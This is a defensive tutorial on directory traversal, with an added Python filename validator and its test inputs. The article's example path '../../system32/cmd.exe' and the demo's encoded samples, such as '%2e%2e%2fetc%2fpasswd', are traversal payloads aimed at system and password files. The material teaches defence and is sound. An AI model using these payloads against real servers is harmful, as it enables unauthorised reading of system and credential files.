Directory Traversal Overview

Directory Traversal vulnerabilities occur, once again, when user-supplied input is not validated. You would think we would get tired of saying this, but it appears to be a very common problem in software. A directory traversal exploit typically occurs when the following characters are not checked for correctly: . / \
Take for example a URL like the following:

www.yoursite.com/openfile.php?filename=myfile.txt

This PHP page references myfile.txt, which it is going to output to the current HTML page. That seems like it shouldn't be a problem, unless you are a malicious user. A malicious user would look at this URL and instantly get an idea: what if, instead of myfile.txt, a ./myfile.txt is supplied? You would think that should work, since it just references the same local file, but the problem is the ./ part. If a ./ is accepted, what about a ../, or maybe a ../../?
If you are thinking about it correctly, you remember that ../ references the parent directory, one level up from the current one. Taking this concept a bit further, a malicious user could input something similar to ../../system32/cmd.exe, which would reference the cmd.exe application on the Windows web server. This has dangerous potential and is a huge security violation.
URLEncoded and other Unicode Variations

Protecting against just . / and \ is not enough. Malicious users are a smart bunch. They will use URL encoding and other Unicode variations to bypass your checking and validation attempts.
How to protect against Directory Traversal attacks

To protect against directory traversal attacks, the developer needs to validate the input correctly against a whitelist. You can't just say that no . is allowed, because in this case you might want to allow a . in the filename. It is best to use a regular expression to verify the filename passed in. A regular expression can be created to accept only an alphanumeric filename followed by a . and then a three-character extension. This provides additional protection against the directory traversal attack.

Unfortunately, we still need to go a step further. To protect against URL-encoded and Unicode variation attacks, you need to URL-decode the input and run it through a Unicode converter to verify that you are working only with the ASCII set of characters, and only then apply the whitelist check.
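The following is an added example, not code from the original article, showing how the two steps above fit together in Python (the article's example page is PHP, but the logic is the same): the input is fully URL-decoded and Unicode-normalized first, rejected if anything non-ASCII remains, and only then matched against the whitelist regular expression (alphanumeric name, a dot, three-character extension). As a defense-in-depth layer it also resolves the accepted name under a base directory and confirms the result stayed inside it. The base directory `/var/www/files` and the function names are assumptions for the demo.

```python
import os
import re
import unicodedata
from typing import Optional
from urllib.parse import unquote

# Assumed document root for the demo; not taken from the original article.
BASE_DIR = "/var/www/files"

# Whitelist from the article: alphanumeric filename, a dot, then a three-character extension.
FILENAME_RE = re.compile(r"^[A-Za-z0-9]+\.[A-Za-z0-9]{3}$")


def normalize_filename(raw: str) -> str:
    """URL-decode until the value stops changing, then apply Unicode NFKC normalization.

    Repeating the decode collapses double-encoded input such as %252e%252e%252f
    (which decodes to %2e%2e%2f and then to ../) so the whitelist sees the final form.
    NFKC folds full-width and other compatibility characters to their plain equivalents.
    """
    decoded = raw
    for _ in range(5):  # bounded so a pathological input cannot loop forever
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return unicodedata.normalize("NFKC", decoded)


def is_safe_filename(raw: str) -> bool:
    """Return True only if the decoded, normalized name is pure ASCII and matches the whitelist."""
    name = normalize_filename(raw)
    if not name.isascii():
        return False
    return FILENAME_RE.fullmatch(name) is not None


def resolve_under_base(raw: str, base_dir: str = BASE_DIR) -> Optional[str]:
    """Defense in depth: join the accepted name to base_dir and prove the result stayed inside it.

    Returns the resolved absolute path, or None if the name failed validation or escaped base_dir.
    """
    if not is_safe_filename(raw):
        return None
    name = normalize_filename(raw)
    base = os.path.realpath(base_dir)
    full = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, full]) != base:
        return None
    return full


if __name__ == "__main__":
    # Constructed sample inputs: the article's legitimate value and the variations it warns about.
    samples = [
        "myfile.txt",                 # legitimate
        "./myfile.txt",               # same file, but the ./ is rejected by the whitelist
        "../../system32/cmd.exe",     # traversal from the article
        "%2e%2e%2fetc%2fpasswd",      # URL-encoded traversal
        "%252e%252e%252f",            # double-encoded traversal
        "%6d%79file.txt",             # URL-encoded but legitimate: decodes to myfile.txt
        "myfile.html",                # four-character extension fails the whitelist
    ]
    for s in samples:
        print(f"{s!r:32} -> {resolve_under_base(s)}")
```

Validation runs on the decoded and normalized value, never on the raw query string, which is what defeats the encoding tricks the previous section describes. The base-directory check is deliberately separate from the whitelist: it catches a future loosening of the regular expression that would otherwise silently reopen the traversal.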
